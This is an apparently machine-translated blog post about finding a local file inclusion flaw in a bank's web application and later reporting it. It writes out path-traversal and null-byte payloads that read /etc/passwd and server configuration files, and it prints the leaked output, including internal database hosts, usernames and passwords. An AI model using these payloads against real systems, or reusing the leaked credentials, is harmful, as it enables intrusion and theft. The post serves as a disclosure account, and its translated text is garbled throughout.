11:53 The Story of a penetration | |
| Topics about catching hackers have forced me to write this post. I'd like to share with you a story that happened to me and my friend a few years ago. Go tell my hobby - the security of web applications. Random Walking on the internet, my friend found a site to send free SMS to Ukrainian mobile operators. There we found a small vulnerability related to circumvention of the Turing test (captcha). Since I and my friend love the look of vulnerability, we played a game, meaning which one of us quickly bypass captcha. But today the story is not about that, and that it was further discovered by us. One day, my friend, looking through the source code page of the site to send free sms found interesting HTML code: <AHREF = "#" onClick = "javascript: window. open ('https: / / hackbank.ua / test.php? code = MOBILE & state = 2 & xslt_url = service_host.xsl', '' quickpay ',' toolbar = 0, status = 0, menubar = 0, scrollbars = 0, width = 650, height = 400 ', false); "CLASS =" header "<IMGSRC =" www.sms1.ua/ img / topupeasy.jpg "WIDTH =" 82 " HEIGHT =" 34 "ALT =" Recharge is easy! "BORDER =" 0 "VSPACE =" 0 "</ A> Link, which logically should download the file to your computer was for us to even very interesting. Less than 5 minutes as we have discovered a vulnerability Local File Inclusion The vulnerability was in the following link: https: / / hackbank.ua / test.php? Code = MOBILE & state = 2 & xslt_url =<local_file With this vulnerability, you can read local files directly in your browser. We made a request to the server for a nonexistent file, and that's what happened: request url: https: / / hackbank.ua / test? & Xslt_url = 0 Reply server was something like this: 500 Servlet Exception ; ; ; ........................... Resin-3.0.s060216 ; (built Thu, 16 Feb 2006 09:17:50 PST) Honestly, I was the first time I heard about Resin'e A Resin - a high-performance server applications, which includes such features as scalability and load balancing. Information about the product, which we managed to learn in Wikipedia at the time: Logo Caucho Technology, Inc. Type of Application Server Developer Caucho Technology, Inc. OS Cross-platform The current version 3.1.1 - May 2007 The GPL Proprietary Software Site www.caucho.com/ (English) Information on Wikipedia After downloading the software, we began to study it. And so, the folder structure of the software Resin: | configure | httpd.exe | LICENSE | Makefile.in | README | setup.exe | +---automake | config.guess | config.sub | install-sh | ltmain.sh | missing | +---bin | httpd.sh | +---conf | app-default.xml | development.conf | fine.conf | minimal.conf | password.xml | resin-3_1.conf | resin-admin.xml | resin.conf | +---contrib | init.resin-iptables | init.resin.in | +---lib | activation.jar | eclipse-compil A Now let's go back to the vulnerability. Let's start with the classics: The link https: / / hackbank.ua / test? Xslt_url =../../../../../../ etc / passwd , we obtain the following conclusion: root: x: 0:0: root: / root: / bin / bash bin: x: 1:1: bin: / bin: / sbin / nologin daemon: x: 2:2: daemon: / sbin: / sbin / nologin adm: x: 3:4: adm: / var / adm: / sbin / nologin lp: x: 4 : 7: lp: / var / spool / lpd: / sbin / nologin sync: x: 5:0: sync: / sbin: / bin / sync shutdown: x: 6:0: shutdown : / sbin: / sbin / shutdown halt: x: 7:0: halt: / sbin: / sbin / halt mail: x: 8:12: mail: / var / spool / mail: / sbin / nologin news: x: 9:13: news: / etc / news: uucp: x: 10:14: uucp: / var / spool / uucp: / sbin / nologin operator: x: 11:0: operator: / root: / sbin / nologin games: x: 12:100: games: / usr / games: / sbin / nologin gopher: x: 13:30: gopher: / var / gopher: / sbin / nologin ftp:x:14:50:FTP User: / var / ftp: / sbin / nologin nobody: x: 99: 99: Nobody: /: / sbin / nologin vcsa: x: 69:69: virtual console memory owner: / dev: / sbin / nologin rpm: x: 37:37:: / var / lib / rpm: / sbin / nologin nscd: x: 28:28: NSCD Daemon: /: / sbin / nologin ident: x: 100:101:: / home / ident : / sbin / nologin netdump: x: 34:34: Network Crash Dump user: / var / crash: / bin / bash sshd: x: 74:74: Privilege-separated SSH: / var / empty / sshd: / sbin / nologin rpc: x: 32:32: Portmapper RPC user: /: / sbin / nologin rpcuser: x: 29:29: RPC ; Servic Then we started to look for, where a locally stored folder / conf Server Resin and found pretty quickly. Configure - is an XML file. Which was available at the link https: / / hackbank.ua / test? Xslt_url =../../../../../../ conf / resin.conf% 00 % 00 - a null-byte, tells the Web server that is the end of the line.Next, consider the source code of the received file. <Resinxmlns: resin = "caucho.com / ns / resin / core "xmlns =" ??caucho.com / ns / resin " <server> ;<httpport = "1080"/> <http; port = "10443" <jsse-ssl> <key-store-type>JKS</ key-store-type> <key-store-file>keys / hackbank.jks</ key-store-file> <password>fynbxfn</ password> <key-manager-factory>6645b</ key-manager-factory> <ssl-context>SSL</ ssl-context> </ jsse-ssl> </ http> <hostid = "" root-directory = "." <Access-logpath = "log / access.log" format = "% h% l% u% t "% r "% s% b "% i " "% i " "rollover-period =" 1W "/> <stderr-logpath = "log / stderr.log" timestamp = "[% Y.% m.% d% H:% M:% S.% s]" rollover-period = "1W"/> <stdout-logpath = "log / stdout.log" rollover-period = " 1W "/> <logpath =" log / server.log "timestamp = "[% Y.% m.% d% H:% M:% S.% s]" rollover-period = "1W"/> ;<web-appid = "/" document-directory = "webapps / ROOT"/> <ear-deploypath = "deploy" ;<ear-defaultejb-server-jndi-name = "java: comp / env / ejb" <ejb-serverjndi-name = "java: comp / env / ejb"/> </ ear-default> ;</ ear-deploy> <web-app-deploypath = " webapps "/> <resource-deploypath =" deploy "/ > <web-app-deploypath = "deploy"/> </ host> <resin: importpath = "$ / conf / db-pool.xml "/> <resin: importpath =" $ / conf/c2b -db-pool.xml "/> <resin: importpath =" $ / conf/db- pool-qp.xml "/> <resin: importpath =" $ / conf / hb-default . xml "/> <resin: importpath =" $ / conf / resin-status.xml "/> </ server> <resin: importpath = " $ / conf / resin-common.xml "/> </ resin> Here all web server logs: https: / / hackbank.ua / test ? xslt_url =../../../../../../ log / access.log https: / / hackbank.ua / test? xslt_url =../../.. /../../../ log / stderr.log https: / / hackbank.ua / test? xslt_url =../../../../../../ log / server.log There's nothing interesting things we found. But we went further:) file ../../../../../../ conf/c2b-db-pool.xml% 00: 10.1.101.195:5000 ----------------- user: C2BServer password: vsirfysy 10.1.100.105:5000 ----------------- user ;: C2BServer password: lfktrbq, thtu 10.1.100.115:5000 ---------------- user: jbkl password: 123456 File ../../../../../../ conf / db-pool.xml% 00: 10.1.101.51:5000 ------------------- user: e16_jag password: u4BKoc7U5Edo 10.1.100.77:5000 ------------------- user ;: hskl password: hsklhskl 10.1.99.49:4100 ------------------ user: wbpfo_p424 password: aUKlOfcvT4YmAnk 10.1.99.82:5000 ------------------ user: P24CVC password: Login_4_P424CVC Guess What is it? That's right, it is to access other servers on the internal network of the bank:) The next day, we wrote a letter, described all the vulnerabilities that we found. And send a letter to the post office bank. After 3 weeks of vulnerabilities present. We sent another letter, and a week later to the delight of our vulnerability was fixed. In this article, we do not like someone to offend, just want to convey to the world that secure systems do not happen. Hire professionals who will make you the information systems audit. If you have any questions please vadim@g-sg.net * Warning! All references, as well as the bank's name changed for reasons of anonymity *Thank you for your attention! UPD. All errors in the text write in private messages. Thank you! | |
|
| |
| Total comments: 0 | |